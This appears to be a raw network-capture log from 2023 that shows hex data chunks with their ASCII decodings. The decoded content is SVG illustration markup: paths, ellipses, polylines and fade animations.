                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6799INData Raw: 31 39 37 63 36 2e 37 35 2d 32 2e 37 31 2c 31 36 2e 31 31 2d 35 2e 36 2c 32 31 2e 37 35 2d 31 30 2e 31 33 4c 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 32 37 2d 37 2e 36 33 2c 32 2e 34 38 2d 32 38 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39 34 2c 33 2d 39 2e 38 35 2c 36 2e 31 32 2d 31 34 2e 38 34 2c 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 36 22 20 64 3d 22 4d 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 33 34 2d 35 2e 36 33 2c 32 2e 34 31 2d 33 30 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39
                                                                                                                                                                                                                                                        Data Ascii: 197c6.75-2.71,16.11-5.6,21.75-10.13L900.16,174l4.27-7.63,2.48-28.26-23.69,14.45c-4.94,3-9.85,6.12-14.84,9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94Z"/><path class="cls-16" d="M900.16,174l4.34-5.63,2.41-30.26-23.69,14.45c-4.9
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6815INData Raw: 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 2e 31 33 2e 37 38 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2e 36 36 2c 31 2e 37 35 2c 31 2e 37 35 2c 30 2c 30 2c 30 2c 2e 35 39 2e 34 35 2c 32 2c 32 2c 30 2c 30 2c 30 2c 31 2e 36 33 2c 30 2c 31 2e 37 35 2c 31 2e 37 35 2c 30 2c 30 2c 30 2c 2e 35 39 2d 2e 34 35 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2d 2e 36 36 41 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 35 32 30 2e 33 34 2c 32 32 39 2e 30 35 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 35 32 34 2c 32 32 36 2e 32 32 71 30 2c 2e 32 31 2c 30 2c 2e 34 38 63 30 2c 2e 31 38 2c 30 2c 2e 33 33 2c 30 2c 2e 34 35 68 30 61 31 2e 36 36 2c 31 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 39 2d 2e 34 32 2c 32
                                                                                                                                                                                                                                                        Data Ascii: 2.5,2.5,0,0,0,.13.78,1.94,1.94,0,0,0,.37.66,1.75,1.75,0,0,0,.59.45,2,2,0,0,0,1.63,0,1.75,1.75,0,0,0,.59-.45,1.94,1.94,0,0,0,.37-.66A2.5,2.5,0,0,0,520.34,229.05Z"/><path class="cls-2" d="M524,226.22q0,.21,0,.48c0,.18,0,.33,0,.45h0a1.66,1.66,0,0,1,.29-.42,2
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6831INData Raw: 37 32 20 36 36 33 2e 35 36 20 33 31 34 2e 32 35 20 36 37 31 2e 32 31 20 33 31 39 2e 30 32 20 36 37 30 2e 36 35 20 33 34 38 2e 39 33 22 2f 3e 3c 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 35 22 20 78 31 3d 22 36 37 31 2e 32 31 22 20 79 31 3d 22 33 32 36 2e 31 32 22 20 78 32 3d 22 36 38 38 2e 37 31 22 20 79 32 3d 22 33 32 34 2e 32 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 36 22 20 64 3d 22 4d 36 36 39 2e 31 39 2c 33 31 33 2e 33 34 76 32 63 30 2c 31 2e 33 36 2c 33 2e 32 33 2c 32 2e 34 36 2c 37 2e 32 31 2c 32 2e 34 36 73 37 2e 32 31 2d 31 2e 31 2c 37 2e 32 31 2d 32 2e 34 36 76 2d 32 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 36 37 36 2e 34 22 20 63 79 3d 22 33 31 33 2e 33 34 22
                                                                                                                                                                                                                                                        Data Ascii: 72 663.56 314.25 671.21 319.02 670.65 348.93"/><line class="cls-75" x1="671.21" y1="326.12" x2="688.71" y2="324.26"/><path class="cls-76" d="M669.19,313.34v2c0,1.36,3.23,2.46,7.21,2.46s7.21-1.1,7.21-2.46v-2"/><ellipse class="cls-38" cx="676.4" cy="313.34"
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6847INData Raw: 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 33 2e 34 35 22 20 72 78 3d 22 31 2e 32 22 20 72 79 3d 22 31 2e 35 34 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 38 2e 39 35 20 35 36 38 2e 37 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 32 2e 32 34 22 20 72 79 3d 22 32 2e 38 38 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69
                                                                                                                                                                                                                                                        Data Ascii: (-38.07)"/><ellipse class="cls-97" cx="848.64" cy="213.45" rx="1.2" ry="1.54" transform="translate(48.95 568.75) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="2.24" ry="2.88" transform="translate(45.69 569.88) rotate(-38.07)"/><elli
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6863INData Raw: 2e 32 39 2c 30 2c 30 2c 31 2c 2e 33 36 2d 2e 33 31 41 31 2e 36 37 2c 31 2e 36 37 2c 30 2c 30 2c 31 2c 38 31 35 2e 36 39 2c 32 35 31 2e 37 38 5a 6d 2d 2e 30 39 2d 31 2e 33 39 63 2e 34 37 2e 33 39 2e 34 39 2e 34 36 2e 34 39 2e 36 73 2d 2e 31 35 2e 34 2d 2e 33 36 2e 33 34 2d 2e 31 33 2d 2e 30 35 2d 2e 34 36 2d 2e 33 34 63 30 2d 2e 30 35 2d 2e 32 38 2d 2e 32 35 2d 2e 33 32 2d 2e 33 61 2e 33 2e 33 2c 30 2c 30 2c 31 2d 2e 30 39 2d 2e 32 33 2e 33 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 33 33 2d 2e 33 33 43 38 31 35 2e 32 36 2c 32 35 30 2e 31 34 2c 38 31 35 2e 33 34 2c 32 35 30 2e 31 38 2c 38 31 35 2e 36 2c 32 35 30 2e 33 39 5a 6d 31 2e 31 37 2e 34 36 61 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 32 33 2e 36 36 63 30 2c 2e 32 31 2d 2e 32 31 2e 32 38 2d 2e 34
                                                                                                                                                                                                                                                        Data Ascii: .29,0,0,1,.36-.31A1.67,1.67,0,0,1,815.69,251.78Zm-.09-1.39c.47.39.49.46.49.6s-.15.4-.36.34-.13-.05-.46-.34c0-.05-.28-.25-.32-.3a.3.3,0,0,1-.09-.23.32.32,0,0,1,.33-.33C815.26,250.14,815.34,250.18,815.6,250.39Zm1.17.46a2.37,2.37,0,0,1,.23.66c0,.21-.21.28-.4
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6879INData Raw: 2e 39 31 6c 2e 31 34 2c 32 2e 32 37 61 33 2e 34 32 2c 33 2e 34 32 2c 30 2c 30 2c 30 2d 33 2e 36 31 2e 30 39 63 2d 32 2c 31 2e 32 31 2d 33 2e 32 38 2c 33 2e 37 31 2d 33 2e 37 2c 33 2e 34 37 73 2d 2e 32 33 2d 32 2e 31 32 2c 31 2e 33 39 2d 33 2e 35 31 53 39 32 32 2e 36 36 2c 32 38 34 2e 35 39 2c 39 32 35 2e 32 35 2c 32 38 34 2e 39 31 5a 22 2f 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 33 22 20 78 3d 22 39 33 30 2e 31 36 22 20 79 3d 22 32 38 35 2e 32 39 22 20 77 69 64 74 68 3d 22 33 2e 37 35 22 20 68 65 69 67 68 74 3d 22 33 2e 31 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 38 36 34 2e 30 36 20 35 37 33 2e 36 37 29 20 72 6f 74 61 74 65 28 2d 31 38 30 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31
                                                                                                                                                                                                                                                        Data Ascii: .91l.14,2.27a3.42,3.42,0,0,0-3.61.09c-2,1.21-3.28,3.71-3.7,3.47s-.23-2.12,1.39-3.51S922.66,284.59,925.25,284.91Z"/><rect class="cls-113" x="930.16" y="285.29" width="3.75" height="3.1" transform="translate(1864.06 573.67) rotate(-180)"/><path class="cls-1
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6895INData Raw: 30 38 2d 33 2e 31 33 63 2d 31 2e 31 35 2d 34 2e 31 33 2d 35 2e 34 32 2d 34 2e 38 2d 39 2d 33 2e 36 34 2d 2e 39 2e 32 39 2d 33 2e 31 37 2c 31 2d 33 2e 34 35 2c 32 73 31 2e 31 32 2c 31 2e 36 2c 31 2e 33 33 2c 32 2e 34 37 63 2e 32 37 2c 31 2e 31 32 2d 2e 35 39 2c 32 2e 31 39 2e 33 34 2c 33 2e 32 36 61 33 2c 33 2c 30 2c 30 2c 30 2c 2e 37 36 2e 36 2c 36 2e 35 38 2c 36 2e 35 38 2c 30 2c 30 2c 30 2c 32 2e 33 35 2c 31 2e 30 37 2c 37 2e 32 38 2c 37 2e 32 38 2c 30 2c 30 2c 30 2c 32 2e 33 37 2d 2e 30 39 6c 31 2e 38 37 2d 2e 32 37 61 35 2e 32 34 2c 35 2e 32 34 2c 30 2c 30 2c 30 2c 32 2e 35 38 2d 2e 38 35 41 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 30 2c 39 30 35 2e 35 37 2c 32 35 33 2e 35 32 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 33 34 22
                                                                                                                                                                                                                                                        Data Ascii: 08-3.13c-1.15-4.13-5.42-4.8-9-3.64-.9.29-3.17,1-3.45,2s1.12,1.6,1.33,2.47c.27,1.12-.59,2.19.34,3.26a3,3,0,0,0,.76.6,6.58,6.58,0,0,0,2.35,1.07,7.28,7.28,0,0,0,2.37-.09l1.87-.27a5.24,5.24,0,0,0,2.58-.85A2.91,2.91,0,0,0,905.57,253.52Z"/><path class="cls-134"
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6911INData Raw: 31 2c 39 31 2e 39 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 35 35 22 20 64 3d 22 4d 38 32 37 2e 35 34 2c 38 36 2e 31 63 2d 2e 31 34 2d 31 2e 36 2d 2e 37 39 2d 33 2e 37 39 2d 32 2e 38 32 2d 32 2e 36 31 41 31 2e 34 2c 31 2e 34 2c 30 2c 30 2c 30 2c 38 32 34 2c 38 35 63 30 2c 32 2e 34 33 2e 36 37 2c 34 2e 37 36 2e 36 36 2c 37 2e 32 61 31 30 2e 36 34 2c 31 30 2e 36 34 2c 30 2c 30 2c 31 2d 32 2d 2e 31 38 2c 39 2c 39 2c 30 2c 30 2c 31 2d 31 2e 31 33 2d 2e 33 31 63 2d 2e 32 32 2d 2e 30 35 2d 31 2e 32 36 2d 2e 34 35 2d 31 2e 34 35 2d 2e 33 73 2e 31 38 2e 37 2e 33 32 2e 38 39 63 2e 32 36 2e 33 37 2e 33 34 2e 34 36 2e 32 33 2e 39 61 2e 38 33 2e 38 33 2c 30 2c 30 2c 31 2d 2e 35 31 2e 36 38 63 2d 2e 31 33 2e 30 36 2d 2e 38 36 2e 32 32 2d 31 2c
                                                                                                                                                                                                                                                        Data Ascii: 1,91.9Z"/><path class="cls-155" d="M827.54,86.1c-.14-1.6-.79-3.79-2.82-2.61A1.4,1.4,0,0,0,824,85c0,2.43.67,4.76.66,7.2a10.64,10.64,0,0,1-2-.18,9,9,0,0,1-1.13-.31c-.22-.05-1.26-.45-1.45-.3s.18.7.32.89c.26.37.34.46.23.9a.83.83,0,0,1-.51.68c-.13.06-.86.22-1,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6927INData Raw: 31 37 2e 39 32 63 2d 2e 31 38 2c 30 2d 34 39 2e 31 32 2c 31 34 2e 31 36 2d 35 38 2e 35 37 2c 31 38 2e 36 2d 37 2e 31 33 2c 33 2e 33 35 2d 31 38 2e 37 33 2c 35 2e 34 33 2d 32 36 2c 38 2e 33 35 2d 34 2e 34 35 2d 2e 39 32 2d 32 33 2e 37 31 2d 36 2e 36 35 2d 32 36 2e 34 37 2d 39 2e 34 35 2c 30 2c 30 2d 31 33 2e 35 2d 33 2d 31 33 2e 35 2d 33 6c 2d 33 30 2e 36 39 2d 33 2e 35 37 63 2d 31 2e 32 34 2d 2e 30 38 2d 34 2d 34 2d 34 2e 38 33 2d 34 2e 39 61 34 33 2e 30 37 2c 34 33 2e 30 37 2c 30 2c 30 2c 30 2d 34 2e 31 37 2d 33 2e 39 35 63 2d 32 2e 30 36 2d 31 2e 37 36 2d 33 2e 39 34 2d 33 2e 38 2d 35 2e 38 39 2d 35 2e 36 38 6c 2d 31 30 2d 39 2e 36 34 63 2d 36 2e 33 36 2d 31 2e 35 36 2d 31 32 2e 37 36 2d 33 2d 31 39 2e 31 32 2d 34 2e 35 36 2d 34 2e 33 35 2d 31 2e 30 38
                                                                                                                                                                                                                                                        Data Ascii: 17.92c-.18,0-49.12,14.16-58.57,18.6-7.13,3.35-18.73,5.43-26,8.35-4.45-.92-23.71-6.65-26.47-9.45,0,0-13.5-3-13.5-3l-30.69-3.57c-1.24-.08-4-4-4.83-4.9a43.07,43.07,0,0,0-4.17-3.95c-2.06-1.76-3.94-3.8-5.89-5.68l-10-9.64c-6.36-1.56-12.76-3-19.12-4.56-4.35-1.08
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6943INData Raw: 73 6c 61 74 65 28 34 37 2e 31 33 20 35 36 33 2e 32 39 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 32 35 22 20 63 79 3d 22 32 31 33 2e 37 31 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 37 20 35 36 33 2e 36 34 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 36 39 22 20 63 79 3d 22 32 31 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e
                                                                                                                                                                                                                                                        Data Ascii: slate(47.13 563.29) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.25" cy="213.71" rx="0.15" ry="0.19" transform="translate(47 563.64) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.69" cy="214.09" rx="0.15" ry="0.19" transform="tran
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6959INData Raw: 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 39 33 20 35 35 30 2e 33 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 34 38 22 20 63 79 3d 22 32 33 33 2e 36 37 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 37 38 20 35 35 30 2e 37 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 39 38 22 20 63 79 3d 22 32 33 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 37 22 20
                                                                                                                                                                                                                                                        Data Ascii: "0.22" transform="translate(28.93 550.36) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.48" cy="233.67" rx="0.17" ry="0.22" transform="translate(28.78 550.76) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.98" cy="234.09" rx="0.17"
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6975INData Raw: 34 2d 2e 35 32 2c 30 2d 31 2e 35 32 2e 31 33 2d 32 2e 30 36 2e 32 32 2d 2e 39 31 2e 37 33 2d 31 2e 37 33 2e 38 37 2d 32 2e 36 36 6c 2e 31 32 2e 30 36 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 53 56 47 2d 66 61 64 65 20 34 73 20 65 61 73 65 20 30 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 38 30 38 2e 38 35 2c 32 38 31 2e 37 37 61 31 2e 38 35 2c 31 2e 38 35 2c 30 2c 30 2c 31 2c 2e 31 31 2d 2e 33 31 63 2d 2e 33 31 2e 36 37 2d 31 2c 31 2d 31 2e 30 39 2c 31 2e 37 38 61 31 31 2c 31 31 2c 30 2c 30 2c 30 2d 2e 31 35 2c 31 2e 31 35 63 30 2c 2e
                                                                                                                                                                                                                                                        Data Ascii: 4-.52,0-1.52.13-2.06.22-.91.73-1.73.87-2.66l.12.06" style="display: block; animation: SVG-fade 4s ease 0s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M808.85,281.77a1.85,1.85,0,0,1,.11-.31c-.31.67-1,1-1.09,1.78a11,11,0,0,0-.15,1.15c0,.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6991INData Raw: 20 32 30 30 2e 35 38 20 36 31 30 2e 36 34 20 32 30 36 2e 30 34 20 36 31 30 2e 38 35 20 32 31 32 2e 37 34 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 33 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 37 31 20 32 32 31 2e 31 37 20 35 39 30 2e 31 38 20 32 32 35 2e 36 36 20 35 39 38 2e 34 35 20 32 32 31 2e 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 39 2e 35 34 20 32 31 31 2e 31 32 20 35 39 32 2e 36 35 20 32 31 36 2e 32 33 20 35 39 39 2e 32 20 32 32 30 2e 32 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 37
                                                                                                                                                                                                                                                        Data Ascii: 200.58 610.64 206.04 610.85 212.74"></polyline><polyline class="cls-53" points="577.71 221.17 590.18 225.66 598.45 221.7"></polyline><polyline class="cls-52" points="579.54 211.12 592.65 216.23 599.2 220.2"></polyline><polyline class="cls-52" points="577
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7007INData Raw: 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 53 56 47 2d 66 61 64 65 20 32 73 20 65 61 73 65 20 30 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 36 30 39 2e 33 33 2c 33 30 34 2e 38 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 30 2c 2e 32 2d 2e 32 38 63 2d 2e 34 2e 36 37 2d 2e 33 31 2c 31 2e 34 38 2d 2e 39 2c 32 61 39 2e 39 34 2c 39 2e 39 34 2c 30 2c 30 2c 31 2d 2e 39 32 2e 38 63 2d 2e 33 38 2e 32 37 2d 2e 36 35 2e 32 2d 31 2c 2e 33 33 2d 2e 37 38 2e 32 35 2d 31 2e 34 33 2c 31 2e 31 37 2d 2e 36 34 2c 31 2e 37 38 61 35 2e 31 38 2c 35 2e 31 38 2c 30 2c 30 2c 30
                                                                                                                                                                                                                                                        Data Ascii: ="display: block; animation: SVG-fade 2s ease 0s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M609.33,304.89a1.62,1.62,0,0,0,.2-.28c-.4.67-.31,1.48-.9,2a9.94,9.94,0,0,1-.92.8c-.38.27-.65.2-1,.33-.78.25-1.43,1.17-.64,1.78a5.18,5.18,0,0,0
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7023INData Raw: 30 2c 2e 34 39 73 30 2c 2e 33 35 2c 30 2c 2e 34 37 68 30 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2c 2e 37 31 2d 2e 38 31 2c 31 2e 37 36 2c 31 2e 37 36 2c 30 2c 30 2c 31 2c 31 2d 2e 33 31 2c 31 2e 38 37 2c 31 2e 38 37 2c 30 2c 30 2c 31 2c 2e 34 35 2c 30 6c 30 2c 31 61 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 30 2d 2e 35 32 2d 2e 30 36 2c 31 2e 35 34 2c 31 2e 35 34 2c 30 2c 30 2c 30 2d 2e 37 2e 31 35 2c 31 2e 34 33 2c 31 2e 34 33 2c 30 2c 30 2c 30 2d 2e 35 2e 34 31 2c 31 2e 37 37 2c 31 2e 37 37 2c 30 2c 30 2c 30 2d 2e 33 2e 35 38 2c 32 2e 36 31 2c 32 2e 36 31 2c 30 2c 30 2c 30 2d 2e 30 39 2e 36 39 76 33 68 2d 31 2e 31 33 56 37 31 2e 31 36 43 38 39 34 2e 34 39 2c 37 31 2c 38 39 34 2e 34 39 2c 37 30 2e 38 31 2c 38 39 34 2e 34 38 2c 37 30 2e 35 37 5a
                                                                                                                                                                                                                                                        Data Ascii: 0,.49s0,.35,0,.47h0a1.92,1.92,0,0,1,.71-.81,1.76,1.76,0,0,1,1-.31,1.87,1.87,0,0,1,.45,0l0,1a2.12,2.12,0,0,0-.52-.06,1.54,1.54,0,0,0-.7.15,1.43,1.43,0,0,0-.5.41,1.77,1.77,0,0,0-.3.58,2.61,2.61,0,0,0-.09.69v3h-1.13V71.16C894.49,71,894.49,70.81,894.48,70.57Z
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7039INData Raw: 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 33 34 2c 32 30 38 2e 36 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 31 31 2c 32 30 31 2e 37 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2c 36 39 36 2c 32 30 33 61
                                                                                                                                                                                                                                                        Data Ascii: path class="cls-4" d="M700.34,208.66a1.71,1.71,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.33-.94,2.41,2.41,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M700.11,201.72a1.73,1.73,0,0,1-.78,2.24A2.53,2.53,0,0,1,696,203a
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7055INData Raw: 22 20 64 3d 22 4d 37 33 31 2e 38 31 2c 33 30 34 2e 37 37 41 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2c 37 33 31 2c 33 30 37 61 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 35 37 2c 32 39 37 2e 38 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35
                                                                                                                                                                                                                                                        Data Ascii: " d="M731.81,304.77A1.73,1.73,0,0,1,731,307a2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M731.57,297.84a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.5
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7071INData Raw: 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 34 32 2c 32 30 30 2e 30 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30
